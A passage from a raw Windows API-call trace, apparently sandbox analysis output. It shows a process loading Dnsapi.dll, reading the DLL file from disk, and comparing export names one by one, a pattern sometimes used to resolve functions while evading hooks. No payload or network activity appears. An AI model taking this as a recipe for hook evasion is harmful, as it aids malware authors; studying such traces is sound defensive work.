(lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0277.716] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0277.716] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0277.716] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0277.716] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0277.717] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 1 [0277.717] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0277.717] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddSerializedElementToStore") returned 1 [0277.717] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddStoreToCollection") returned 1 [0277.717] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAlgIdToOID") returned 1 [0277.717] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertCloseServerOcspResponse") returned 0 [0277.717] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLContextToStore") returned 1 [0277.717] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLLinkToStore") returned 1 [0277.717] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLContextToStore") returned 1 [0277.717] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLLinkToStore") returned 1 [0277.717] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateContextToStore") returned 1 [0277.717] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0277.717] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0277.717] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0277.717] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0277.717] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0277.717] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0277.717] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0277.717] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0277.717] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0277.717] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddSerializedElementToStore") returned 1 [0277.717] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddStoreToCollection") returned 1 [0277.717] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAlgIdToOID") returned 1 [0277.717] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseServerOcspResponse") returned 1 [0277.717] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseStore") returned 0 [0277.718] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLContextToStore") returned 1 [0277.718] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLLinkToStore") returned 1 [0277.718] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLContextToStore") returned 1 [0277.718] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLLinkToStore") returned 1 [0277.718] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateContextToStore") returned 1 [0277.718] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateLinkToStore") returned 1 [0277.718] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCRLToStore") returned 1 [0277.718] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCTLToStore") returned 1 [0277.718] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToStore") returned 1 [0277.718] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0277.718] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0277.718] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0277.718] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponse") returned 1 [0277.718] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0277.718] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddSerializedElementToStore") returned 1 [0277.718] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddStoreToCollection") returned 1 [0277.718] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAlgIdToOID") returned 1 [0277.718] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseServerOcspResponse") returned 1 [0277.718] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseStore") returned 1 [0277.718] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCompareCertificate") returned 0 [0277.718] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLContextToStore") returned 1 [0277.718] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLLinkToStore") returned 1 [0277.718] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLContextToStore") returned 1 [0277.718] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLLinkToStore") returned 1 [0277.718] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateContextToStore") returned 1 [0277.719] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateLinkToStore") returned 1 [0277.719] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCRLToStore") returned 1 [0277.719] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCTLToStore") returned 1 [0277.719] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToStore") returned 1 [0277.719] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0277.719] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0277.719] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0277.719] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponse") returned 1 [0277.719] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0277.719] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddSerializedElementToStore") returned 1 [0277.719] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddStoreToCollection") returned 1 [0277.719] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAlgIdToOID") returned 1 [0277.719] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseServerOcspResponse") returned 1 [0277.719] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseStore") returned 1 [0277.719] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificate") returned 1 [0277.719] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificateName") returned 0 [0277.719] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLContextToStore") returned 1 [0277.719] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLLinkToStore") returned 1 [0277.719] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLContextToStore") returned 1 [0277.719] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLLinkToStore") returned 1 [0277.719] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateContextToStore") returned 1 [0277.719] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateLinkToStore") returned 1 [0277.719] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCRLToStore") returned 1 [0277.719] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCTLToStore") returned 1 [0277.719] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToStore") returned 1 [0277.719] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0277.720] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0277.720] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0277.720] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponse") returned 1 [0277.720] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0277.720] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddSerializedElementToStore") returned 1 [0277.720] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddStoreToCollection") returned 1 [0277.720] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAlgIdToOID") returned 1 [0277.720] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertCloseServerOcspResponse") returned 1 [0277.918] GetProcessHeap () returned 0x470000 [0277.918] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40c4040 | out: hHeap=0x470000) returned 1 [0277.928] GetProcessHeap () returned 0x470000 [0277.928] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x489340 [0277.929] LoadLibraryA (lpLibFileName="Dnsapi.dll") returned 0x7ffc5a8a0000 [0277.945] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0278.062] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0278.062] GetModuleFileNameA (in: hModule=0x7ffc5a8a0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")) returned 0x1e [0278.062] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0278.062] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0278.063] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0278.063] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=686984) returned 1 [0278.063] GetProcessHeap () returned 0x470000 [0278.063] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa7b88) returned 0x3a3d010 [0278.065] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0278.065] ReadFile (in: hFile=0x17c, lpBuffer=0x3a3d010, nNumberOfBytesToRead=0xa7b88, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x3a3d010*, lpNumberOfBytesRead=0x14f5a4*=0xa7b88, lpOverlapped=0x0) returned 1 [0278.081] CloseHandle (hObject=0x17c) returned 1 [0278.081] lstrcmpA (lpString1="AdaptiveTimeout_ClearInterfaceSpecificConfiguration", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 0 [0278.081] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0278.081] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 0 [0278.081] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0278.081] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0278.082] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 0 [0278.082] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0278.082] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0278.082] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AddRefQueryBlobEx") returned 1 [0278.082] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="BreakRecordsIntoBlob") returned 0 [0278.082] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0278.082] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0278.082] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AddRefQueryBlobEx") returned 1 [0278.082] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="BreakRecordsIntoBlob") returned 1 [0278.082] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="Coalesce_UpdateNetVersion") returned 0 [0278.082] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0278.082] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0278.082] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AddRefQueryBlobEx") returned 1 [0278.082] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="BreakRecordsIntoBlob") returned 1 [0278.082] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="Coalesce_UpdateNetVersion") returned 1 [0278.082] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="CombineRecordsInBlob") returned 0 [0278.082] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0278.082] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0278.082] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 1 [0278.083] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="BreakRecordsIntoBlob") returned 1 [0278.083] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0278.083] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="CombineRecordsInBlob") returned 1 [0278.083] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="DeRefQueryBlobEx") returned 0 [0278.083] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0278.083] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0278.083] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AddRefQueryBlobEx") returned 1 [0278.083] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="BreakRecordsIntoBlob") returned 1 [0278.083] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="Coalesce_UpdateNetVersion") returned 1 [0278.083] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="CombineRecordsInBlob") returned 1 [0278.083] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DeRefQueryBlobEx") returned -1 [0278.083] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DelaySortDAServerlist") returned 0 [0278.083] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0278.083] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0278.083] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AddRefQueryBlobEx") returned 1 [0278.083] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="BreakRecordsIntoBlob") returned 1 [0278.083] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="Coalesce_UpdateNetVersion") returned 1 [0278.083] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="CombineRecordsInBlob") returned 1 [0278.083] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DeRefQueryBlobEx") returned 1 [0278.083] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DelaySortDAServerlist") returned 1 [0278.083] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DnsAcquireContextHandle_A") returned 0 [0278.083] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0278.083] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0278.083] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AddRefQueryBlobEx") returned 1 [0278.083] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="BreakRecordsIntoBlob") returned 1 [0278.083] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="Coalesce_UpdateNetVersion") returned 1 [0278.084] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="CombineRecordsInBlob") returned 1 [0278.084] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DeRefQueryBlobEx") returned 1 [0278.084] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DelaySortDAServerlist") returned 1 [0278.084] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_A") returned 1 [0278.084] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_W") returned 0 [0278.084] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0278.084] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0278.084] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="AddRefQueryBlobEx") returned 1 [0278.084] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="BreakRecordsIntoBlob") returned 1 [0278.084] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="Coalesce_UpdateNetVersion") returned 1 [0278.084] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="CombineRecordsInBlob") returned 1 [0278.084] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DeRefQueryBlobEx") returned 1 [0278.084] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DelaySortDAServerlist") returned 1 [0278.084] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_A") returned 1 [0278.084] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAcquireContextHandle_W") returned 1 [0278.084] lstrcmpA (lpString1="DnsAllocateRecord", lpString2="DnsAllocateRecord") returned 0 [0278.084] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0278.084] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0278.084] lstrcmpA (lpString1="DnsApiAlloc", lpString2="AddRefQueryBlobEx") returned 1 [0278.084] lstrcmpA (lpString1="DnsApiAlloc", lpString2="BreakRecordsIntoBlob") returned 1 [0278.084] lstrcmpA (lpString1="DnsApiAlloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0278.084] lstrcmpA (lpString1="DnsApiAlloc", lpString2="CombineRecordsInBlob") returned 1 [0278.084] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DeRefQueryBlobEx") returned 1 [0278.084] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DelaySortDAServerlist") returned 1 [0278.084] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0278.084] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0278.084] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsAllocateRecord") returned 1 [0278.085] lstrcmpA (lpString1="DnsApiAlloc", lpString2="DnsApiAlloc") returned 0 [0278.085] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0278.085] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0278.085] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="AddRefQueryBlobEx") returned 1 [0278.085] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="BreakRecordsIntoBlob") returned 1 [0278.085] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="Coalesce_UpdateNetVersion") returned 1 [0278.085] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="CombineRecordsInBlob") returned 1 [0278.085] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DeRefQueryBlobEx") returned 1 [0278.085] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DelaySortDAServerlist") returned 1 [0278.085] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_A") returned 1 [0278.085] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAcquireContextHandle_W") returned 1 [0278.085] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsAllocateRecord") returned 1 [0278.085] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAlloc") returned 1 [0278.085] lstrcmpA (lpString1="DnsApiAllocZero", lpString2="DnsApiAllocZero") returned 0 [0278.085] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0278.085] lstrcmpA (lpString1="DnsApiFree", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0278.086] lstrcmpA (lpString1="DnsApiFree", lpString2="AddRefQueryBlobEx") returned 1 [0278.086] lstrcmpA (lpString1="DnsApiFree", lpString2="BreakRecordsIntoBlob") returned 1 [0278.086] lstrcmpA (lpString1="DnsApiFree", lpString2="Coalesce_UpdateNetVersion") returned 1 [0278.086] lstrcmpA (lpString1="DnsApiFree", lpString2="CombineRecordsInBlob") returned 1 [0278.086] lstrcmpA (lpString1="DnsApiFree", lpString2="DeRefQueryBlobEx") returned 1 [0278.086] lstrcmpA (lpString1="DnsApiFree", lpString2="DelaySortDAServerlist") returned 1 [0278.086] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_A") returned 1 [0278.086] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAcquireContextHandle_W") returned 1 [0278.086] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsAllocateRecord") returned 1 [0278.086] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAlloc") returned 1 [0278.086] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiAllocZero") returned 1 [0278.086] lstrcmpA (lpString1="DnsApiFree", lpString2="DnsApiFree") returned 0 [0278.086] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0278.086] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0278.086] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="AddRefQueryBlobEx") returned 1 [0278.086] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="BreakRecordsIntoBlob") returned 1 [0278.086] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="Coalesce_UpdateNetVersion") returned 1 [0278.086] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="CombineRecordsInBlob") returned 1 [0278.086] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DeRefQueryBlobEx") returned 1 [0278.086] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DelaySortDAServerlist") returned 1 [0278.086] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_A") returned 1 [0278.087] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAcquireContextHandle_W") returned 1 [0278.087] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsAllocateRecord") returned 1 [0278.087] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAlloc") returned 1 [0278.087] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiAllocZero") returned 1 [0278.087] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiFree") returned 1 [0278.087] lstrcmpA (lpString1="DnsApiHeapReset", lpString2="DnsApiHeapReset") returned 0 [0278.087] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0278.087] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0278.087] lstrcmpA (lpString1="DnsApiRealloc", lpString2="AddRefQueryBlobEx") returned 1 [0278.087] lstrcmpA (lpString1="DnsApiRealloc", lpString2="BreakRecordsIntoBlob") returned 1 [0278.087] lstrcmpA (lpString1="DnsApiRealloc", lpString2="Coalesce_UpdateNetVersion") returned 1 [0278.087] lstrcmpA (lpString1="DnsApiRealloc", lpString2="CombineRecordsInBlob") returned 1 [0278.087] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DeRefQueryBlobEx") returned 1 [0278.087] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DelaySortDAServerlist") returned 1 [0278.087] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_A") returned 1 [0278.087] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAcquireContextHandle_W") returned 1 [0278.087] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsAllocateRecord") returned 1 [0278.087] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAlloc") returned 1 [0278.087] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiAllocZero") returned 1 [0278.087] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiFree") returned 1 [0278.087] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiHeapReset") returned 1 [0278.087] lstrcmpA (lpString1="DnsApiRealloc", lpString2="DnsApiRealloc") returned 0 [0278.087] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0278.087] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0278.088] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="AddRefQueryBlobEx") returned 1 [0278.088] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="BreakRecordsIntoBlob") returned 1 [0278.088] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="Coalesce_UpdateNetVersion") returned 1 [0278.088] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="CombineRecordsInBlob") returned 1 [0278.088] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DeRefQueryBlobEx") returned 1 [0278.088] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DelaySortDAServerlist") returned 1 [0278.088] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_A") returned 1 [0278.088] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAcquireContextHandle_W") returned 1 [0278.088] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsAllocateRecord") returned 1 [0278.088] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAlloc") returned 1 [0278.088] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiAllocZero") returned 1 [0278.088] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiFree") returned 1 [0278.088] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiHeapReset") returned 1 [0278.088] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiRealloc") returned 1 [0278.088] lstrcmpA (lpString1="DnsApiSetDebugGlobals", lpString2="DnsApiSetDebugGlobals") returned 0 [0278.088] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0278.088] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0278.088] lstrcmpA (lpString1="DnsAsyncRegisterHostAddrs", lpString2="AddRefQueryBlobEx") returned 1 [0278.088] 